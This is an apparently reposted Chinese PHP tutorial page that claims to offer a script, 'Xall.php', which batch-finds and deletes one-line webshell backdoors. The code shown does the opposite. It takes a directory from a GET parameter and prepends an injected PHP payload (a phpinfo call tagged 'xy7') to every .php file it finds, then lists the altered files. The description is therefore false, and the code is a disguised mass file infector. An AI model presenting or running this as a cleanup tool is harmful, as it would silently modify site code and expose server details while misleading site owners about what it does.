用php实现批量查询清除一句话后门的代码

piaodoo 编程教程 2020-02-02 18:11:09 1210 0 php教程

一句话后门一般简单，容易隐藏危害大，查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码，大家可以省去不少麻烦了

总是忘记一句话放到哪个文件里去了，直接全部干掉...

复制代码代码如下:

<?//xy7  
if (!isset($dir) or empty($dir)) {  
$dir=str_replace('\\','/',dirname(__FILE__));  
echo "<font color=\"#00688B\">".$dir."</font>";  
} else {  
$dir=$_GET['dir'];  
echo "<font color=\"#00688B\">".$dir."</font>";  
}  
$evilcode="<?phpinfo();//xy7?>";  
$testdir = opendir($dir);  
while($filea = @readdir($testdir)){  
if(strstr($filea, '.php')){  
$fp = @fopen($filea, 'r+');  
if (!strstr(@fread($fp, 20), 'xy7')){  
rewind($fp);  
$old = @fread($fp, filesize($filea));  
rewind($fp);  
fwrite($fp, $evilcode . $old);  
}  
fclose($fp);  
}  
}  
closedir($testdir);  
?>  
<hr>  
<table width="100%" border="0" cellpadding="3" cellspacing="1">  
<tr>  
<td><b>被X的文件</b></td>  
<td><b>时间</b></td>  
<td><b>大小</b></td>  
</tr>  
<?php  
$dirs=@opendir($dir);  
while ($file=@readdir($dirs)) {  
if ((is_file($file)) and (ereg("\.php{0,1}$",$file)))  
{$b="$dir/$file";  
$a=@is_dir($b);  
if($a=="0"){  
$size=@filesize("$dir/$file");  
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));  
echo "<tr>\n";  
echo "<td>$file</td>\n";  
echo " <td>$lastsave</td>\n";  
echo " <td>$size Bytes</td>\n";  
}  
}  
}  
@closedir($dirs);  
?>  
</table> 

codz by xuanmumu

版权声明：

本站所有资源均为站长或网友整理自互联网或站长购买自互联网，站长无法分辨资源版权出自何处，所以不承担任何版权以及其他问题带来的法律责任，如有侵权或者其他问题请联系站长删除！站长QQ754403226 谢谢。

有关影视版权：本站只供百度云网盘资源，版权均属于影片公司所有，请在下载后24小时删除，切勿用于商业用途。本站所有资源信息均从互联网搜索而来，本站不对显示的内容承担责任，如您认为本站页面信息侵犯了您的权益，请附上版权证明邮件告知【754403226@qq.com】，在收到邮件后72小时内删除。本文链接：http://www.piaodoo.com/4233.html